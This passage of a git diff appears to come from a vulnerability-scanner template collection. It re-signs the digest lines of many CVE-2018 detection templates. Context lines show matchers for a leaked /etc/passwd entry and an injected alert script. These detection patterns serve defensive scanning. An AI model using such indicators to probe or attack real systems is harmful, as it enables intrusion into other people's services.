a/http/cves/2018/CVE-2018-18608.yaml b/http/cves/2018/CVE-2018-18608.yaml index 4e97a203a8..a995d5aba7 100644 --- a/http/cves/2018/CVE-2018-18608.yaml +++ b/http/cves/2018/CVE-2018-18608.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ada522c6515fbef84bfe2b72a16b37eef4b726a80645ce815f8c839f8c3de084022100a9cee0e3010f2c7eab42fd53f0e934584477eeedaf5019a443621776728004e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c43687be0d104b8b61c5820fb3108d1d4a4cfa6bea57b77dcbcd94a7af9ea2e022100936a9dd029ea2f1718385f1222bd9262bae98a93d800bfc22900ee053409f0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18777.yaml b/http/cves/2018/CVE-2018-18777.yaml index 27f9cdb3c9..834b7ac852 100644 --- a/http/cves/2018/CVE-2018-18777.yaml +++ b/http/cves/2018/CVE-2018-18777.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f5bd07c891d0db92b2c4f1e4cbadea6203eafbdf92fabe4996837f51c1c865140221009130e54e81edb9b84222f0c1678adb7130f74463a53656948e28b6ad2491440e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae2a757ac5e3ef34ba3a5451c8125e2c7fe97fd9bef596f66376117e2764db670221008367fce471250198dca07e7745de56033b0108d5296706c7f9484ab47fed9ae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index c43ce87f60..3e8b1624af 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dde2f46dea081ad6ee497f625921fa627e85d86066f46bf0412c3baea3dee44c022100e29b218c3b2f0d942643f9520686a1c2ac7ffe7606193b38c7433e3006313eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bb4b10a8be843bbc16bdad1882a670d91a4df47976608093c047e589d1ec9d5f022100db20167c16d3b5a54b8abadd1035b44725fa8989926dadda9c968bc8727520d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18809.yaml b/http/cves/2018/CVE-2018-18809.yaml index ea93f406fa..7f19b027a3 100644 --- a/http/cves/2018/CVE-2018-18809.yaml +++ b/http/cves/2018/CVE-2018-18809.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022051e000ecdfd4aa645d1ea0afc88abe972a800a4c61b68a33c00d1e9fb5e511f7022100d82adc8517d67a9a0efbf2798fcd8b9642478f1f7df6f7bc8a2caafc7c07ce11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220643bdad602251cc6d58d10ec184ad17a9593ec38da13e56f779cf51b825cb69d022100ba41ad28cf862dd0e27bf39455c80ca81106197236893508abca3f291d04b6b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml index 963396b644..656f2b91d4 100644 --- a/http/cves/2018/CVE-2018-18925.yaml +++ b/http/cves/2018/CVE-2018-18925.yaml @@ -46,4 +46,4 @@ http: - type: dsl dsl: - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")' -# digest: 4a0a00473045022100bbf18497c1473eb6fbe65f6fb7e2e9354eb16f76dca39b94fb6541e925e349d30220208960e8eb0667755eda381be2612e38a59d7c23d8f8a6a5418cb030d27d8b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c343b83bb6fcdc9813518d37b54f04f87156c39b79722af6ac38cc7fdd596bca0220703ec1e97ae904cd7b353800c82f2b395a48062f8439eec1b4b4a2a9eabe91c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml index afccd29931..13bedfdfac 100644 --- a/http/cves/2018/CVE-2018-19137.yaml +++ b/http/cves/2018/CVE-2018-19137.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f031d999e765991f0aa2d1aae2aa9d4c79d9a3839f1dcf48b2c61a3f22a12a2a02202bbbf84485e9943cb9edeb0da4319e13626c70d6079238edafe328e4e16318fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml index 9f10e7535b..f7e60c03fc 100644 --- a/http/cves/2018/CVE-2018-19287.yaml +++ b/http/cves/2018/CVE-2018-19287.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022017ffefd669f716542939f3fbf7cb21c395e7c7444f9c185954a4b4d3f5db6f09022100960d179e7780f639d861a3b9a8d4a7186dc971253532f6ecf8aaaee57396e1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201fb81765e18255ee1455d4ffdf1c2f4a8423e9fa99a230aef65bdf36dce39db4022100ab9385e54fd245662105f2243c1d25bc4e1c82be787d4f23aea1c9273d13a2cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml index f3bd161914..3f65170707 100644 --- a/http/cves/2018/CVE-2018-19326.yaml +++ b/http/cves/2018/CVE-2018-19326.yaml @@ -49,4 +49,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a004630440220161c573e68df00e50a9701801bdb980e503335d9521e4ad0338c169a567e5e9d0220779ded7472b14bcaba423f3f073c212a454643ec0e7cb5f75d4385047afd57a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022007c53cf671939677e00de61243865a0068c5542caaa6c5cd30f75ccdd260b635022100f46356ee53fbf6fa0d8cd6812648b170cec5116aa67dee258bc1d3a8601851da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 038510ea48..5e97818e28 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d7436ced4be69231d67f9b6d6fddf86f75ca1a49358007478a1cacc3869f56c02206093ccabaa5b727f429b541d96da3d9028334eb9b029a25ba8128795d70b7f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 18852cc354..7fbd5422cb 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb661a6ea402a8fe1df0ba6f686efa2e17994e84eb11f9c17383364f88f285880220308c0de4c8f2b5e65feb3809c645cc919a6494252251cc678e86295fca8383a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7e6ee6c4a5dacc72f204038317f3d576080fb833cb02aab58fb9a32ac0339ed0220684eb3d85d15b9ecff6fc2978c4574372dc3adf26c14c12edff24287e95f6c0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index dcec2bddcb..617694b8dd 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -38,4 +38,4 @@ http: part: body words: - "<script>alert(1337)</script><!--" -# digest: 4a0a00473045022034e4f3773f6fe6c17c2785fc9f503480a43a4592a29941cd299c3b270443e977022100b542dd168aea80fc80f765fbdd82311ec2ec4f6b2b73c9ddbfaa6600da4ceddb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b56844229e6ea053b76640548002d26a57799ac1aadafb6ac77fe1d2972d54f4022100a6626f55ef074890ccbffc21b3a56cc95fb44114a0314ae2a1cca4245a7d0956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml index 6489b3df7e..c2f77901aa 100644 --- a/http/cves/2018/CVE-2018-19458.yaml +++ b/http/cves/2018/CVE-2018-19458.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220204f850c1e4defb3d1370eca6bbeda7634b6bae66b03d027afb26bedc5a812790221008d7871c547a7ed1deeb7c785fd365cc8f4ff36b31cf24980d303f8a20351e93d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011870a0b8c603246e50b7b9233e220338e0bbadfd36d43476eb3a604a8f15909022100fd66dce4ecef6a71328de5d49b7f2c823806736b0f6d62098d105a9fbb5fd37a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml index 6304862422..f5baab9f0d 100644 --- a/http/cves/2018/CVE-2018-19749.yaml +++ b/http/cves/2018/CVE-2018-19749.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - "contains(body_3, '>')" condition: and -# digest: 4b0a00483046022100c2a0e755f2e7f7a0744d4444c1e2d3880abdcaf721e4f7a8dc1e593faaf4521e0221008758fdacd7ef1cdf080680a53f6ab8d435d736dbc60a7c8f9440afa49d90d100:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022049417fe6bfe7dcc4ad5a03f7e74d98650d87b5d7245e8b3222aa41a4a1809a1702201961b9d27ac98ce526df8f1b59834668eda162155a7a5f7a858d647ea60e7ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml index 3d18f63916..380099a6ff 100644 --- a/http/cves/2018/CVE-2018-19752.yaml +++ b/http/cves/2018/CVE-2018-19752.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220233adb77a26a1b91da079bdf0eb8b3aae6997e9e8eafc1246a94b187acbcf10e022100cc16f3f453b69215c3af952bc5f242abcd26f8e2c38445664464564ddb39f26d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201707716fab9d016dc5515f68c70df0fb1e11303df71bd29e6948decdff46feec02201ff410eb73141ddfa99e74625b1f20c3225ff3fd33ddf6269d783113327efc71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml index 82d738f155..75c7ac7400 100644 --- a/http/cves/2018/CVE-2018-19753.yaml +++ b/http/cves/2018/CVE-2018-19753.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203b1e3f5a79179da858d3ed0fe9cfc7c1a14782a0a49ed6cc890416c693cc750802204c31d262dd2fe2068a966af611deae253623d196a0a03e790194ec274a50c467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c8023778b8d9d0e2a4b1e77c7200d3ecab62642b04c19419876641d5065ad736022100a7d6988ea608d6df29fba1b12d6b37f695f46be24d54be889f7b785d5b0a331e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml index bf0f6435cf..8527c4570b 100644 --- a/http/cves/2018/CVE-2018-19914.yaml +++ b/http/cves/2018/CVE-2018-19914.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 4a0a00473045022100ad4d510c1ce185b5e401199a825d93783a0f561aa134a108265d89f119b1d1750220431ecb234bab21342ca9f250c34c079cce22eeeffd6f278fcb778923f3661b2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082567122e6fdb26a676a6bf9632fb1376794f424c30727b0a814271d6d61ce20022045995d0b06448d4e6a25a10ee8b63a3dd2537e8dbf054859a7c5ac26000d3d75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml index 4849988a1a..6388d0d596 100644 --- a/http/cves/2018/CVE-2018-19915.yaml +++ b/http/cves/2018/CVE-2018-19915.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 490a0046304402201c56275b5b7376244d1fee0f3bfde7381ade0cb088f1643b3c5e1e668e81b4490220205f8398d1ae9260a0ecd27f592441a68d4709a669d802e783370b414c610020:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fac7ca8ae973e6c79b47d129a94c03d07d3e0934745e51edb52510fd5ae51aa502210083fdaf58ca60aa3c6a60cd156c45000e72257ba726ed8cc254fb10cc62edc2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml index 953e994164..b86732351d 100644 --- a/http/cves/2018/CVE-2018-20009.yaml +++ b/http/cves/2018/CVE-2018-20009.yaml @@ -58,4 +58,4 @@ http: - 'contains(header_3, "text/html")' - 'contains(body_3, ">")' condition: and -# digest: 4a0a004730450220228d241f2ef228aa07915c9b1770c0a34473f66ec0ee918ba511d13df0a08d64022100e196267d6f49e1a417092b2d74d1123fbd4c5d366bb4ed2f01e227431da6b846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af0ae3cbc2a555217c64dff7da257aeb9cfbae5552ff0f531b5b20c3672028cd022057d92c9509347c4bab862fe765ae5dd01ac0bd3a52932e1fce59f3299a038292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml index 6401a9bde0..dc31dcf008 100644 --- a/http/cves/2018/CVE-2018-20470.yaml +++ b/http/cves/2018/CVE-2018-20470.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220416555074a2363c09646f56423f9c459c447e730675f68f1c7a1139e2349e881022100d3472326257aa27dec50b113e6f576559301190c17b3ea7436347e20c6f83fa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204719a63abf07b3b3a032779a7bab0597c6f4ae74729ada98a4725a344d8fe104022100fcd44b9a53fcd6525a05dd74f322e03b13200615741b6a14fdaba4d5ca989999:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20526.yaml b/http/cves/2018/CVE-2018-20526.yaml index 64e5e72dc3..8d404e7272 100644 --- a/http/cves/2018/CVE-2018-20526.yaml +++ b/http/cves/2018/CVE-2018-20526.yaml @@ -85,4 +85,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220437d3c29a18e53486a8e39f9ad913b02a35912b2bcb3c21e63e069c76fe4f154022100a4d6a84d1e7d454bdc3f5c9758a7d44ea6d1c23ce4ad0a31a88d07f3a9aad85b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ee02dd47b6b3c05b72a24cdb480ebcc738ba4837418f2ac64ab1dfeab56a387022100f2c41a434ce9405e513488732ab8468d5d007f7507f6a3a740f78bc65bbe2cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20824.yaml b/http/cves/2018/CVE-2018-20824.yaml index 4c87867f11..4135025d8b 100644 --- a/http/cves/2018/CVE-2018-20824.yaml +++ b/http/cves/2018/CVE-2018-20824.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cacbdeb0c0af358ac6503810fd58e5fc0911a7c724b4bd307787bc2a6ae191e5022100e3b0228d4c1ba7bf5ead1493a9895e11d08a9a54416af57cd5e6a90616e82cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220451e0c729542bbf1f70a346710c8cc9f758c0e3517c5c0664ef0e781961e55d40221009d3fe32da8a123ae8a019a4c99ed760251ef534e01f21ab955844156628bcea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-20985.yaml b/http/cves/2018/CVE-2018-20985.yaml index 9fcb7d32f2..79e24ec02c 100644 --- a/http/cves/2018/CVE-2018-20985.yaml +++ b/http/cves/2018/CVE-2018-20985.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fdf21dd8cd4338be7ef85dd90d5a1ee48232987d93292d9c32864bb6cb2d2a430220312aab11cf40c9bd216d8db9bc9f8f4986e176b437d99d3e68974648edb3f37d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220465e274aa68efa6686c443bbbe9e61467f303374cdbc4a1a88bee6a3a4e792ef02201c9beb67a520e6effc9618566ca883bd170c9262e7ae52530ec543ba9390b37a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2791.yaml b/http/cves/2018/CVE-2018-2791.yaml index cca5ece28d..969faa9ec4 100644 --- a/http/cves/2018/CVE-2018-2791.yaml +++ b/http/cves/2018/CVE-2018-2791.yaml @@ -52,4 +52,4 @@ http: - '' - 'Missing translation key' condition: and -# digest: 4a0a0047304502210096fbefd79be923637f34a237dd95d633f7e1e74c9032024e1303095269e5f54d022056d644bf998c6da11f5cddeefd63cd48b65e7536f9c5cf39b706495941eba4a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220716e12214dbdee6365d2769db9b03c7eaa018cf4c26aa116c3c94e26ddcdd222022100be0eba9196b3fda90765c49757d936a3531c9737fed08f379e27f3b36c7d0462:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-2894.yaml b/http/cves/2018/CVE-2018-2894.yaml index 66281bf064..aba5e76e50 100644 --- a/http/cves/2018/CVE-2018-2894.yaml +++ b/http/cves/2018/CVE-2018-2894.yaml @@ -106,4 +106,4 @@ http: regex: - ([0-9]+){{randstr}} internal: true -# digest: 4b0a004830460221009a9dfdd4c197c7c4fc4ce6f158ec9894ce7a3b9bfc2c1ef97e6aaa4a4e0e799d022100dbb7c5a8718e01c302077fcd00797a90fb8604536d28cc3c355adf7269590934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b83441e3166c0b0df2a8987853e3c5879b9c6085dcbb0cd6fc1adcb0a5a70138022100c1f01ed6dd9afe9b30f2ee90a24612dc75903fcd58176553091cec2c83e7a700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index bd77c65d17..c1ff4055ec 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203b5a861798bdaf310c79a99603903b8ed83143fc9868db8f34672e8d49edd92602210092223b9b93d18c686fbd2cf8ce05306dd736f5253ff970bffbde3a280894dbe8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2243bdf0ff24133ea1ffd807103c979f9efdf7ec5963e6f15434034355b8cf5022071c7295b8292d28d5509b5c3d67bd6f3eeeecccf185dfdb06de47ab9e90c37f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 8fe945a216..a0904bc7c6 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml @@ -55,4 +55,4 @@ http: - '' - 'Variables.cs_imagedir' condition: and -# digest: 4a0a00473045022013a622a0be9811b7d0ecdc8066a260e6803c6a08dacb80434f4d33ada5ea7b720221008f364d396fe6a4affacdbfa5cbf828b6d1aae0e5d8fbaebbdc16a8417ff8915e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220519311794181f4103c777c46b8ec38f32a52b8d58fd08ec5c41e24b873de75b4022017edf115e38b468d4ffb211426b442ff23610c659a974b6c0aa532fdee5ecf76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 40b848310b..938d71b76f 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b138fbd3bbd489f08bd33858718f0442f6505a373448138b9dcab407fc9c6f0d02200ef70b95e53275733e292c2ca0ea7e64bd6524a631001790a986ac2e9c23ef93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e292b775f495cee76f716227f5dd4f8303296744b5ddfd30df10db6e346985290220043f44579862f82d6d7e74fc6bb683fd81c202cc7d66fcc96793e875d1ab8cea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5233.yaml b/http/cves/2018/CVE-2018-5233.yaml index 117df9b4f3..0394c5bda9 100644 --- a/http/cves/2018/CVE-2018-5233.yaml +++ b/http/cves/2018/CVE-2018-5233.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ac12beeb0765408098385cec10cfe7119f4fe1c654855fcde0ce13620853190f02202639f2f594675cb8c6f82c9bd44043fd33e85be4ecaed774de7983a7e86955fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d94c87049351a7f101fba0ce3581719bf527bb968cce242462e921bafa0078f02200bc9faa1036e72caf538f0ddb1b87af9dab5610c4bb1656fa71d9e41048c03f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index b0003b1f1d..42d6e8e136 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008c05e33006dbd780fae660e050aed278fd7987296118a56c8d9a0638a8e7ef7602207002a6abd15e8a9725e7831f8da20415beeb6ea650ca5ef0d4fea381f31669a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205cbe5bc8927aa551dacb48b3bd778916c3a1b69cfebc4f4b803cb99ca8c670160220709e158072a722d8ff00a439bbf24f831dcd951d065ae4962d2ee56ceb893da9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index e4e740a06e..7938f8680a 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220366ea8f6eabe8f7fe1d1af4ce9b6fdd86c53702b2427ffaaa91fdeb6c139c77402210086e4d831ecc7b1f17817a499555c0a272319b49cdb3789ee5a671751f3aaf3d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fb92c4f132a4c77e2a6d30db6a1542220ceb34cc491834093e91897ef2900b002200b2abc6e1eff9c1d819081c3d6e143d471641d33399dcae94ea1d557b3f4a9c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 9d3b618e4b..ceddc694fa 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046ed6ab052aa19638a0ffc3dcbee16692a234b44a030f4b38d7b47aa8d9451c8022100f4af3e59fc9802e8697ff78159b0c24ed36a4c06abd1f7d3fe55618b7945eb56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fcf47f518b5c8a2c231867c828cddd000f1cc983e51583f84e7c24dfc925445a022100d09a0b84827184d7a8da4a412b6937c6436e1b9b4ace03f2af2130806f6baa11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index dcaba6686e..e491283770 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f4a971fd11c1a927c6e873c51427acdcd586d9c2448cabe3510e615451cc809d0221008b30ac4f0c3254be852c1b557d4d975cdb12e938e9d8f75acfb27c6557b5266a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ec5427f7148858468b07f9d9752089db2bd5c548e72827ce9456cfce69fe860022018534fbeffb2b41e4f76779db2f06ae1771689e3a9fc8a2e6c892de2fb687be4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 8ba372490a..8cfdc5acb1 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220122cea15066daaf440abc612242447e22e46d4e4efd9e40c5694fd5e0a1e9a27022100b98f2037d4800d9ea956fe9b5112e967c1493ffebb1b7c072c7c96a4c8309673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220057eae85c0699ecc345f4158ec61b98fb01dbe82f6b264cee2a711b22c1b3b28022100a931745c97d34d3e518456589ca9cdd2f2d1c4d4920d8748cecdba748eec1d70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index 38ef7d5c37..69d0d38bd5 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml @@ -42,4 +42,4 @@ http: - '"message":' - '"trace":[' condition: and -# digest: 4a0a00473045022058d8c40d9e7df2e5d4b15882827256af64c97188dd2c24cbc0d0dc4c5d0f9e710221009869b1fb16948e81ec247976f03a6b5cbfc308f3525ff89b85f799154ddab604:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3cacb61106a5b9d82fd0811be6d79b187ae1aaec468bba807985596f77f33f502204bcaec65aa83143087b15a608470e714185f27e09db3881db95feb28f050b704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index 80f34c24ca..ea5dbc252f 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -52,4 +52,4 @@ http: - 'status_code == 200' - 'contains(body, "PrintMonitor") && contains(header, "text/html")' condition: and -# digest: 4b0a00483046022100943388e630f780887fc461ebd2b12bde74a8292ae62fade14d472388d6320299022100e0ef9ae2497c7b48c98c934d40e7a921b8c47516acc6bbcbb11c401c2c34ff5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220207da10f0dc507b4fe74ff6e86ff0f5f8ed80271153998a385043d4d7dd6fffe022023ef15c2a79389d9f4f724a90dd9102aae5e3457652f1ee51d7b229dfc072f85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index 93bad7a63c..c9101e2e91 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -44,4 +44,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a004730450220730596c3b65f6bdb1c012bfa332c6bcfa973e2cedf141af5fc48871182c27c67022100c3f14b8377a6fb6afe484202a9ca1e0209357ef0b47a569e5c5c3e3217be0d48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220595472e5219c255041d68beff4e28f8d16b5f7b56454fc40802348439e85c6a7022100c9f265886bcf394f98ef35ea532cb1743084d4d6f8a20cf57812f11efca4ac4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 502607e70a..300f5b46da 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ 